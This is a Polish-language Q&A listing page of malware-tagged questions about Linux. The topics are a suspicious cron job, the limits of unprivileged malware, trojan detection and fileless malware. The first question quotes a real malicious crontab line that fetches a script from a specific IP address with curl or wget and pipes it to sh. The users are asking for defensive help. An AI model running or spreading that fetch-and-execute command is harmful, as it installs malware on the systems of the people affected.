Pytania otagowane jako malware


2
Podejrzany wpis w crontabie uruchamiający „xribfa4” co 15 minut
Chciałem dodać coś do mojego głównego pliku crontab na moim Raspberry Pi i znalazłem wpis, który wydaje mi się podejrzany, szukając części tego w Google nic nie znalazłem. Wpis Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Zawartość http://103.219.112.66:8000/i.shto: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir …
59 security  cron  malware 

8
Czy złośliwe oprogramowanie uruchamiane przez użytkownika bez uprawnień administratora lub sudo może zaszkodzić mojemu systemowi? [Zamknięte]
Po ostatniej włamaniu na maszynę z systemem Linux znalazłem plik wykonywalny w folderze domowym użytkownika ze słabym hasłem. Wyczyściłem wszystko, co wydaje się być wszystkimi uszkodzeniami, ale dla pewności przygotowuję pełne wyczyszczenie. Co może zrobić złośliwe oprogramowanie uruchamiane przez użytkownika niebędącego sudo lub nieuprzywilejowanego użytkownika? Czy szuka tylko plików oznaczonych …
30 security  malware 



4
Jak wykryć i usunąć trojana Linux?
Niedawno (ponownie) natknąłem się na to: Trojan Linux pozostaje niezauważony przez prawie rok (Unreal IRCd) Tak, wiem, że dodanie losowego PPA / oprogramowania z niezaufanego źródła wymaga problemów (lub gorzej). Nigdy tego nie robię, ale wielu tak robi (wiele blogów i tabloidów na Linuksie promuje dodawanie PPA do fantazyjnych aplikacji, …
16 security  malware 


2
Jak działa złośliwe oprogramowanie bez plików w systemie Linux?
Rozumiem definicję złośliwego oprogramowania bez plików: Szkodliwy kod, który nie jest oparty na plikach, ale istnieje tylko w pamięci… W szczególności złośliwy kod bez plików… dołącza się do aktywnego procesu w pamięci… Czy ktoś może wyjaśnić, jak działa to dołączanie do aktywnego procesu w pamięci? Ponadto, jaka ochrona (jądro) / …
Korzystając z naszej strony potwierdzasz, że przeczytałeś(-aś) i rozumiesz nasze zasady używania plików cookie i zasady ochrony prywatności.
Licensed under cc by-sa 3.0 with attribution required.